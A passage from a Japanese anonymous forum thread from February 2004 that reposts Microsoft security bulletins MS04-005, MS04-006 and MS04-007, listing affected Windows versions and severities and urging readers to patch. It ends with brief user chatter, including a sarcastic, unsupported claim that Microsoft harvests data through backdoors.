Abstract Syntax Notation 1 (ASN.1) は、多くのアプリケーションおよびデバイスに
より使用されるデータ標準で、これによりさまざまなプラットフォーム間でのデータの
正規化および理解が可能となります。ASN.1 に関する詳細情報は、マイクロソフト
サポート技術情報 252648 をご覧下さい。

マイクロソフト サポート技術情報 - 252648 [XGEN] ASN.1 および BER の簡単な紹介
http://support.microsoft.com/default.aspx?scid=kb;ja;252648
1078窓板住人 ◆winDOwS0aE :04/02/11 14:28 ID:???
Virtual PC for Mac の脆弱性により、権限が昇格する (835150) (MS04-005)
登録日 : 2004/02/11 更新日 : 2004/02/11
http://www.microsoft.com/japan/technet/security/bulletin/ms04-005.asp


このセキュリティ情報の対象となるユーザー : MicrosoftR Virtual PC for Mac を使用しているお客様
脆弱性の影響 : 権限の昇格
最大深刻度 : 重要
推奨する対応策 : お客様は、このセキュリティ修正プログラムを可能な限り早期にインストールして下さい
含まれる過去の修正プログラム : なし
警告 : なし

影響を受けるソフトウェア :
Microsoft Virtual PC for Mac Version 6.0, 6.01, 6.02, 6.1

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms04-005e.asp
セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS04-005
1079窓板住人 ◆winDOwS0aE :04/02/11 14:28 ID:???
Windows インターネット ネーム サービス (WINS) の脆弱性により、コードが実行される (830352) (MS04-006)
登録日 : 2004/02/11 更新日 : 2004/02/11
http://www.microsoft.com/japan/technet/security/bulletin/ms04-006.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR Windows インターネット ネーム サービス (WINS)R をご使用のお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 重要
推奨する対応策 : WINS サーバーの管理者は、セキュリティ修正プログラムをできるだけ早期にインストールしてください。
含まれる過去の修正プログラム : なし
警告 : なし

影響を受けるソフトウェア :
Microsoft Windows NT Server 4.0, Service Pack6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Server Service Pack 2, Microsoft Windows 2000 Server Service Pack 3, Microsoft Windows 2000 Server Service Pack 4
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64-bit Edition
Windows Update からインストールすることもできます。
1080窓板住人 ◆winDOwS0aE :04/02/11 14:29 ID:???
影響を受けないソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows 2000 Professional Service Pack 2, Microsoft Windows 2000 Professional Service Pack 3, Microsoft Windows 2000 Professional Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003, Microsoft Windows XP 64-Bit Edition Version 2003 Service Pack1

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/MS04-006e.asp
セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS04-006

技術的な説明 :
Windows インターネット ネーム サービス (WINS) にセキュリティ上の脆弱性が存在します。
この脆弱性は、特別な細工がされたパケットの長さを WINS が検証する方法に問題があるために
起こります。攻撃者が Windows Server 2003 でこの脆弱性を悪用し、特別な細工をした一連の
パケットを WINS サーバーに送信し、サービスを異常終了させる可能性があります。これにより、
サービス拒否が起こる可能性が最も高く、機能を回復するためには、サービスを手動で再起動する
必要があります。
1081窓板住人 ◆winDOwS0aE :04/02/11 14:29 ID:???
(続き)
Windows Server 2003 のサービス拒否は、Windows Server 2003 の開発で使用されるセキュリティ
機能によって起こる可能性があります。このセキュリティ機能は、スタックベースのバッファ
オーバーランの悪用を検出し、バッファ オーバーランが容易に悪用される可能性を低減します。
このセキュリティ機能は、悪質なコードの実行を防ぐためにサービスを強制的に終了する場合が
あります。Windows Server 2003 では、バッファ オーバーランが悪用されそうになると、この
セキュリティ機能が作動し、サービスを終了します。これにより、WINS のサービス拒否の状況が
起こります。今後このセキュリティ機能を回避し、コードが実行される方法が発見される可能性が
あるため、お客様はこの修正プログラムを適用してください。
Windows NT および Windows 2000 では、この脆弱性の性質は少し異なります。WINS は、
特別な細工がされたパケットを拒否するため、攻撃されてもサービス拒否は起こりません。
また、これらのプラットフォーム上の脆弱性を悪用し、コードを実行することはできません。
マイクロソフトは予防策として、今後この脆弱性を悪用する方法が見つけられた場合に、
これらのプラットフォームを保護するため、そのプラットフォーム向けにこの脆弱性の影響を
受けるコードを修正するセキュリティ修正プログラムをリリースしました。

深刻度 :
Microsoft Windows NT 4.0 注意
Microsoft Windows NT Server 4.0, Terminal Server Edition 注意
Microsoft Windows 2000 注意
Microsoft Windows Server 2003 重要
ASN .1 の脆弱性により、コードが実行される (828028) (MS04-007)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-007.asp
影響を受けるソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64-Bit Edition

参考:
WindowsのASN.1に、任意の操作が実行可能な“緊急"の脆弱性
http://internet.watch.impress.co.jp/cda/news/2004/02/11/2063.html
おいおい、緊急のアップデートでたってよ!

NT系列のヤシはWindows Update急いでしる!!
1084名無しさん@お腹いっぱい。:04/02/11 14:48 ID:4ho16MHu
こういう「穴」って、見つかった、ってことは、これまでずっと「開いたまま」だったってこと?

駄々漏れってことか?
1085名無しさん@お腹いっぱい。:04/02/11 14:59 ID:kGpR1mim
だな
1086名無しさん@お腹いっぱい。

今更何言ってるんですか?あなたのデータはずっとこういうバックドアからMSに吸い上げられていますよ。